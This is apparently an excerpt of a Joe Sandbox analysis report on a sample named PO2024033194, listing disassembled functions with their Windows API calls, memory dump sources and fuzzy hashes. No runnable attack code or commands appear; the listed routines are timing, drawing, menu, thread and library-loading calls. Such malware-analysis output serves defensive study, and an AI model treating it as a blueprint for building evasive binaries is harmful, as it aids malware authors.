                                                                  Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                  • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                  • String ID:
                                                                  • API String ID: 2833360925-0
                                                                  • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                  • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                                  • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                  • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                                  Function 004555A8 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32 ref: 004555C7
                                                                  • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                                  • DeleteObject.GDI32(?), ref: 00455736
                                                                  • DeleteObject.GDI32(?), ref: 00455744
                                                                  • DestroyIcon.USER32(?), ref: 00455752
                                                                  • DestroyWindow.USER32(?), ref: 00455760
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                  • String ID:
                                                                  • API String ID: 3691411573-0
                                                                  • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                  • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                                  • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                  • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                                  Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                    • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                    • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                  • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                  • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                  • EndPath.GDI32(?), ref: 004472D6
                                                                  • StrokePath.GDI32(?), ref: 004472E4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                  • String ID:
                                                                  • API String ID: 372113273-0
                                                                  • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                  • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                                  • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                  • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                                  Function 0044CC51 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDC.USER32(00000000), ref: 0044CC6D
                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CapsDevice$Release
                                                                  • String ID:
                                                                  • API String ID: 1035833867-0
                                                                  • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                  • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                                  • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                  • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                                  Function 00417082 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __getptd.LIBCMT ref: 0041708E
                                                                    • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                    • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                  • __amsg_exit.LIBCMT ref: 004170AE
                                                                  • __lock.LIBCMT ref: 004170BE
                                                                  • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                                  • _free.LIBCMT ref: 004170EE
                                                                  • InterlockedIncrement.KERNEL32(00902D90), ref: 00417106
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                  • String ID:
                                                                  • API String ID: 3470314060-0
                                                                  • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                  • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                                  • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                  • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                                  Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                  • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                    • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                  • String ID:
                                                                  • API String ID: 3495660284-0
                                                                  • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                  • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                                  • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                  • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                                  Function 00410AB0 Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual
                                                                  • String ID:
                                                                  • API String ID: 4278518827-0
                                                                  • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                  • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                                  • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                  • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                                  Function 004151BB Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                    • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                    • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                  • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                    • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                  • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                  • ExitThread.KERNEL32 ref: 004151ED
                                                                  • __freefls@4.LIBCMT ref: 00415209
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                  • String ID:
                                                                  • API String ID: 442100245-0
                                                                  • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                  • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                                  • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                  • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                                  Function 0045F790 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                    • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                  • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                  • _wcslen.LIBCMT ref: 0045F94A
                                                                  • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                  • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                  • String ID: 0
                                                                  • API String ID: 621800784-4108050209
                                                                  • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                  • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                                  • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                  • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                  Function 00478172 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 176COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                  • SetErrorMode.KERNEL32 ref: 004781CE
                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                    • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                  • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                  • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                  • String ID: \VH
                                                                  • API String ID: 3884216118-234962358
                                                                  • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                  • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                                  • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                  • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                                  Function 00434B02 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 108libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                                  • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                                  • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadProc
                                                                  • String ID: AU3_GetPluginDetails$#v
                                                                  • API String ID: 145871493-3662034293
                                                                  • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                                  • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                                  • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                                  • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                                  Function 00448480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                  • IsMenu.USER32(?), ref: 0044854D
                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                  • DrawMenuBar.USER32 ref: 004485AF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Item$DrawInfoInsert
                                                                  • String ID: 0
                                                                  • API String ID: 3076010158-4108050209
                                                                  • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                  • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                                  • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                  • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                                  Function 00469CDB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                                  • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
